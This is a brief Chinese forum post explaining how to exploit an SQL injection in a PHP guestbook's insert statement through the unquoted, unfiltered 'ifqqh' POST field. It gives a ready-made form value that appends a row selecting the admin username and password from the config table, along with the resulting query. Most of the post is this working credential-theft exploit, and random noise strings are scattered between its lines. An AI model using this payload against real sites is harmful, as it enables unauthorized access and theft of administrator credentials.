留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
) R2 v' a8 f( o; D. ^2 l
$ l5 X4 }8 u4 \, a) { u$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。( i/ f; j2 t! s7 V
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
1 b3 u# }& [. @4 G
* W2 o+ p( E7 i提交的时候把ifqqh的值改一下。变成
2 ~2 V1 k6 g' j3 b, R7 K1 w* b4 f; S% D! R' I
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
9 T( B+ r. f/ ~; `7 d. [2 E2 f! W, X* f- x) X' U! C
这样SQL插入语句就变了.
) X; d; s3 |2 `. d/ v- p- S, U# N3 A6 q0 }
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
* h' [, Y# e+ z0 s: Z( Y+ ?+ ~7 Y5 q1 k! O* G
构造了另外一句SQL。并且把帐号密码读出来。: J. F$ D; S: Z, G# X1 o5 M+ w4 u7 _2 i
4 O. G* Q+ p' O: ]9 {: w
|
发表于 2013-2-19 08:10:11
收藏
支持
反对